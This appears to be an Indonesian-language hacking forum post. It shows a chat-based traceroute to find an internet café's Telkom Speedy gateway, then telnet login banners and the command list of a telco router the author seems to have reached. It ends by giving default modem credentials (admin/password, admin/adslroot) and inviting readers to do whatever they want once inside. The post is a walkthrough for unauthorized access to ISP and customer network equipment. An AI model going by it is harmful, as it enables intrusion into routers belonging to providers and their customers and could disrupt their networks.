oke bentar saya tanyak ama kawan yang pakai speedy di warnetnya.
Hadi: gus
Hadi: ketik nang dos koyok wingi
juss_orange: hadir
juss_orange: woce
Hadi: tracert www.malanghack.net
Hadi: paste mrene
Hadi: endi cok
juss_orange: Tracing route to malanghack.net [2.67.10.157]
over a maximum of 30 hops:
1 <1 ms <1 ms <1 ms 192.168.0.1
2 <1 ms <1 ms <1 ms 192.168.1.1
3 53 ms 52 ms 53 ms 1.subnet125-164-127.speedy.telkom.net.id [125.164.127.1]
4 55 ms 52 ms 53 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]
5 521 ms 425 ms 82 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8.]
6 489 ms 838 ms 607 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67.10.157]
Hadi: oke thanks
Itu hasil di warnet jadi GW warnet 125.164.127.1 << ini he he he
sekarang kita cobak masuk ke router telkom pusat Gatewaynya
******************************************************* **
* All rights reserved (1997-04) &n bsp; *
* Without the owner’s prior written consent, *
*no decompiling or reverse-engineering shall be allowed.*
******************************************************* **
Login authentication
Password:
Note: The max number of VTY users is 5, and the current number
of VTY users on line is 1.
hehehe ITu main router dari 125.164.96.1 Gw personal sekarang kita cobak dari GW warnet apa sama ?
******************************************************* **
* All rights reserved (1997-04) &n bsp; *
* Without the owner’s prior written consent, *
*no decompiling or reverse-engineering shall be allowed.*
******************************************************* **
Login authentication
Password:
Note: The max number of VTY users is 5, and the current number
of VTY users on line is 1.
Ha ha ha ha rupanya sapa personal ama warnet
User view commands:
bootload Set bootload information
cd &n bsp; Change current directory
clock Specify the system clock
compare Compare function
copy Copy from one file to another
debugging Enable system debugging functions
delete Delete a file
dir List files on a file system
display Display current system information
downsfu Down SFU’s DASL port
fixdisk Recover lost chains in storage device
format Format the device
free Clear user terminal interface
ftp Open FTP connection
language-mode Specify the language environment
lock Lock current user terminal interface
mkdir Create a new directory
more Display the contents of a file
move Move the file
msdp-tracert MSDP traceroute to source RP
mtracert Traceroute to multicast source
net Set net switch mode
patch Patch subcommands
ping Ping function
pwd Display current working directory
quit Exit from current command view
reboot Reboot whole router.
refresh Refresh routes
rename Rename a file or directory
reset Reset operation
rmdir Remove an existing directory
save Save current configuration
schedule schedule system task
send Send information to other user terminal interface
slave Specify HA command
startup Config paramater for system to startup
super Privilege current user a specified priority level
switch Switch communication channel
system-view Enter the system view
telnet Establish one TELNET connection
terminal Set the terminal line characteristics
tftp Open TFTP connection
tracert Trace route function
undelete Recover a deleted file
undo Cancel current setting
unzip Decompress a file
upgrade Online upgrade software
xmodem Receive a file by Xmodem protocol
zip Compress a file
itu command dari xmodem mereka …..
Oke sekarang kita analisa dari di atas.
Prolink modem biasanya password default mereka login : admin pass: password atau ada merk soho Login : admin : adslroot dll
silakan tergantung kreatifitas anda he he he.
Kalau kita dah masuk server itu tergantung kita mau apakan itu hehehe